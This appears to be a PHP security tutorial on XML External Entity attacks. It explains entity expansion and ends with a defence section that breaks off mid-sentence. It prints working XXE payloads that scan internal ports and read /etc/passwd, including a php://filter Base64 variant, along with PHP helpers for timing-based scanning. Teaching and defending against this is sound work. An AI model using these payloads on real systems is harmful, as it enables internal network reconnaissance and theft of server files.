XML is widely used throughout PHP applications to represent arbitrary data structures, for example in SOAP and REST web services. It supports external entities, which let you bring in information from external sources. This is useful when you want to create common references that are shared between XML documents - when you update the external source, the change shows up in every XML document that references it. For example, when we update the file copyright.xml, the new content is automatically pulled into the XML document below.
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE copyright [
<!ELEMENT copyright (#PCDATA)>
<!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml">
]>
<copyright>&c;</copyright>
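The same mechanism can be tried locally without a network connection. The following is a minimal sketch, not code from the original write-up: the helper name loadWithExternalEntity and the temporary file are hypothetical, it assumes a Unix-like path so that "file://" plus the path forms a valid URI, and it passes LIBXML_NOENT because PHP builds linked against libxml2 2.9.0 or later only substitute external entities when that flag is given.

```php
<?php
// Hypothetical helper (not from the original article): parse a document whose
// entity "c" points at a local file and return the expanded element text.
function loadWithExternalEntity(string $entityPath): string
{
    $xml = '<?xml version="1.0" standalone="no" ?>'
         . '<!DOCTYPE copyright ['
         . '<!ELEMENT copyright (#PCDATA)>'
         . '<!ENTITY c SYSTEM "file://' . $entityPath . '">'
         . ']>'
         . '<copyright>&c;</copyright>';

    // LIBXML_NOENT asks libxml2 to substitute entities, which includes
    // fetching the external one. Only use it on input you trust.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
    if ($doc === false) {
        throw new RuntimeException('XML could not be parsed');
    }
    return (string) $doc;
}

// Demo: the shared text lives in one file and is pulled in at parse time.
$shared = tempnam(sys_get_temp_dir(), 'cpy');
file_put_contents($shared, 'Copyright 2011 Example Corp');
echo loadWithExternalEntity($shared), PHP_EOL;
unlink($shared);
```

Changing the contents of the shared file changes what every referencing document expands to, which is exactly the convenience that the rest of this post shows being abused.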
SimpleXML lets us bring any URL - for example http://www.example.com/blahblahblah.xml - into the document. The problem is that if the external entity can't be fetched, or isn't valid XML, it won't get parsed and PHP will emit warnings like these.
Warning: simplexml_load_string(): php_network_getaddresses: getaddrinfo failed: Name or service not known in xml.php on line 5
Warning: simplexml_load_string(http://www.example.com/blahblahblah.xml): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in xml.php on line 5
Security issues arise because PHP places no restrictions on which URLs can be accessed; any URL that the parser can reach can be included in the XML as an external entity. Even if allow_url_fopen is set to false, it is still possible to include these files. Furthermore, it is possible to specify the port to which the XML parser will connect. Here we connect to localhost on port 22:
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]> <scan>&test;</scan>
As long as PHP error messages are enabled, you get back the banner of the service running on that port, even if the service doesn't speak HTTP.
Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed! SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10
If error messages are suppressed, it is still possible to work out whether a service is running on a port by comparing the time taken to connect to a known open port (such as localhost:80) with the time taken to connect to a known closed port. Using this technique, it's possible to scan the networks attached to the XML parser endpoint for services that would otherwise be blocked from the outside world by a firewall.
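The timing comparison can be reproduced against a machine you control. This is only a rough sketch under stated assumptions: the helper timeEntityFetch is hypothetical, it passes LIBXML_NOENT so that current PHP builds actually attempt the fetch, and the two ports in the demo are placeholders for a port you know to be open and one you know to be closed on your own host.

```php
<?php
// Hypothetical helper: measure how long the parser spends trying to resolve
// an external entity that points at $host:$port. Returns seconds.
function timeEntityFetch(string $host, int $port): float
{
    $xml = sprintf(
        '<!DOCTYPE scan [<!ENTITY test SYSTEM "http://%s:%d">]><scan>&test;</scan>',
        $host,
        $port
    );

    // Collect libxml errors internally instead of printing them, mimicking a
    // target that has error display switched off.
    $previous = libxml_use_internal_errors(true);

    $start = hrtime(true);                      // nanoseconds, monotonic
    @simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
    $elapsed = (hrtime(true) - $start) / 1e9;   // convert to seconds

    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $elapsed;
}

// Demo against your own machine; 80 and 81 are assumptions, adjust as needed.
printf("port 80: %.4f s\n", timeEntityFetch('127.0.0.1', 80));
printf("port 81: %.4f s\n", timeEntityFetch('127.0.0.1', 81));
```

A single measurement is noisy, so in practice you would repeat each probe several times and compare the typical values rather than one reading.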
XML for Arbitrary File Disclosure
It turns out that not only can you include remote URLs, you can also include local files (a.k.a. Arbitrary File Disclosure) by using the file:// prefix (thanks to Am for pointing this out) e.g.
<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]> <scan>&test;</scan>
If the result is echoed back to the end user, it will contain a copy of /etc/passwd. The caveat is that the local file must be valid XML, which means that you can't include binary files directly. However, using PHP filters it's possible to encode binary files as a Base64 string e.g.
<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]> <scan>&test;</scan>
This means that any PHP system parsing XML is potentially vulnerable to Local and Remote File disclosure attacks.
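To see why the Base64 filter gets around the valid-XML restriction, it helps to look at what the php://filter wrapper returns on its own. The sketch below is illustrative only: readAsBase64 is a hypothetical helper and the sample bytes are made up. It reads a file containing bytes that would break an XML parser and checks that the filtered output uses only the Base64 alphabet, none of which is special in XML.

```php
<?php
// Hypothetical helper: read a file through PHP's base64 stream filter,
// the same wrapper used in the entity declaration above.
function readAsBase64(string $path): string
{
    $data = file_get_contents(
        'php://filter/read=convert.base64-encode/resource=' . $path
    );
    if ($data === false) {
        throw new RuntimeException('Could not read ' . $path);
    }
    return $data;
}

// Sample content with a NUL byte and XML metacharacters (made-up data).
$binary = "\x00\x01<&>\xff";
$tmp = tempnam(sys_get_temp_dir(), 'b64');
file_put_contents($tmp, $binary);

$encoded = readAsBase64($tmp);
unlink($tmp);

// Only A-Z, a-z, 0-9, +, / and = should appear in the encoded text.
var_dump(preg_match('/^[A-Za-z0-9+\/=]*$/', $encoded) === 1);
// Decoding recovers the original bytes exactly.
var_dump(base64_decode($encoded, true) === $binary);
```

Whoever receives the expanded entity only has to Base64-decode it to recover the original file contents.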
Defending against XML External Entity attacks
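There doesn't appear to be a PHP configuration setting that disables the external entity feature. However, by calling the function libxml_disable_entity_loader before the XML is parsed, it is possible to turn external entities off at run time and protect yourself from this threat. (On PHP 8.0 and later the function is deprecated, because libxml2 2.9.0 and newer no longer load external entities unless LIBXML_NOENT is passed.) Usage looks like this e.g.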